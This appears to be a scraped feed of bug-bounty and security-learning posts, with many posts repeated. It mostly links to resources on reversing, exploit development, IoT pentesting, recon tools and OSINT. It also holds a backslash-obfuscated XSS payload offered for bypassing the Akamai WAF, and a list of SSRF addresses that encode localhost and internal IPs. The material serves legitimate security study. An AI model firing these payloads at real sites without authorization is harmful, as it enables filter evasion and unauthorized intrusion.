A good way to bypass the Akamai WAF by exploiting a redirect-based XSS is with the following payload:
javascript:new%20Function`al\ert\`1\``;
You can also obfuscate it using HTML entities
#BugBounty
javascript:new%20Function`al\ert\`1\``;
You can also obfuscate it using HTML entities
#BugBounty
Social Distancing Survival Guide
Learn...
Reverse Engineering:
https://github.com/tylerha97/awesome-reversing
Reverse Engineering Malware:
https://malwareunicorn.org/workshops/re101.html#0
https://malwareunicorn.org/workshops/re102.html#0
Web Hacking:
https://portswigger.net/web-security
https://github.com/infoslack/awesome-web-hacking/blob/master/README.md
Exploit Development:
https://github.com/FabioBaroni/awesome-exploit-development/blob/master/README.md
Learn...
Reverse Engineering:
https://github.com/tylerha97/awesome-reversing
Reverse Engineering Malware:
https://malwareunicorn.org/workshops/re101.html#0
https://malwareunicorn.org/workshops/re102.html#0
Web Hacking:
https://portswigger.net/web-security
https://github.com/infoslack/awesome-web-hacking/blob/master/README.md
Exploit Development:
https://github.com/FabioBaroni/awesome-exploit-development/blob/master/README.md
GitHub
GitHub - tylerha97/awesome-reversing: A curated list of awesome reversing resources
A curated list of awesome reversing resources. Contribute to tylerha97/awesome-reversing development by creating an account on GitHub.
APT Lifecycle:
https://azeria-labs.com/advanced-persistent-threat/
Arm Assembly:
https://azeria-labs.com/writing-arm-assembly-part-1/
Arm32 Shellcoding:
https://azeria-labs.com/writing-arm-shellcode/
https://azeria-labs.com/tcp-reverse-shell-in-assembly-arm-32-bit/
Heap Exploitaiton:
https://azeria-labs.com/heap-exploit-development-part-1/
https://azeria-labs.com/heap-overflows-and-the-ios-kernel-heap/
https://azeria-labs.com/grooming-the-ios-kernel-heap/
https://azeria-labs.com/advanced-persistent-threat/
Arm Assembly:
https://azeria-labs.com/writing-arm-assembly-part-1/
Arm32 Shellcoding:
https://azeria-labs.com/writing-arm-shellcode/
https://azeria-labs.com/tcp-reverse-shell-in-assembly-arm-32-bit/
Heap Exploitaiton:
https://azeria-labs.com/heap-exploit-development-part-1/
https://azeria-labs.com/heap-overflows-and-the-ios-kernel-heap/
https://azeria-labs.com/grooming-the-ios-kernel-heap/
Azeria-Labs
Advanced Persistent Threat
Pentesting IoT devices
Part 1: https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html
Part 2: https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html
Books and resources: https://github.com/V33RU/IoTSecurity101/blob/master/README.md
Part 1: https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html
Part 2: https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html
Books and resources: https://github.com/V33RU/IoTSecurity101/blob/master/README.md
Mindedsecurity
Pentesting IoT devices (Part 1: Static Analysis)
Introduction Intelligent dishwashers, smart factories, connected sensors and Wi-Fi fridges, these are only a few examples of everyday ...
#bugbounty
Pentest-guide
https://github.com/Voorivex/pentest-guide
naabu
https://github.com/projectdiscovery/naabu
Osmedeus
https://github.com/j3ssie/Osmedeus
SubDomainizer
https://github.com/nsonaniya2010/SubDomainizer
security-tools
https://github.com/bl4de/security-tools
assessment-mindset
https://github.com/dsopas/assessment-mindset
Sudomy
https://github.com/Screetsec/Sudomy
#bugbountytips
Pentest-guide
https://github.com/Voorivex/pentest-guide
naabu
https://github.com/projectdiscovery/naabu
Osmedeus
https://github.com/j3ssie/Osmedeus
SubDomainizer
https://github.com/nsonaniya2010/SubDomainizer
security-tools
https://github.com/bl4de/security-tools
assessment-mindset
https://github.com/dsopas/assessment-mindset
Sudomy
https://github.com/Screetsec/Sudomy
#bugbountytips
GitHub
GitHub - Voorivex/pentest-guide: Penetration tests guide based on OWASP including test cases, resources and examples.
Penetration tests guide based on OWASP including test cases, resources and examples. - Voorivex/pentest-guide
Another SSRF List:
http://[::]:80/
http://[::]:25/
http://[::]:22/
http://[::]:3128/
http://0000::1:80/
http://0000::1:25/
http://0000::1:22/
http://0000::1:3128/
http://127.0.1.3
http://127.0.0.0
http://0177.0.0.1/
http://2130706433/
http://3232235521/
http://3232235777/
http://[::]:80/
http://[::]:25/
http://[::]:22/
http://[::]:3128/
http://0000::1:80/
http://0000::1:25/
http://0000::1:22/
http://0000::1:3128/
http://127.0.1.3
http://127.0.0.0
http://0177.0.0.1/
http://2130706433/
http://3232235521/
http://3232235777/
https://medium.com/@benjamindbrown/finding-mcafee-a-case-study-on-geoprofiling-and-imagery-analysis-6f16bbd5c219
#OSINT
#OSINT
Medium
Finding McAfee: A Case Study on Geoprofiling and Imagery Analysis
Identify past, current, and possible future locations through the geolocation and chronolocation of media provided by a specific user.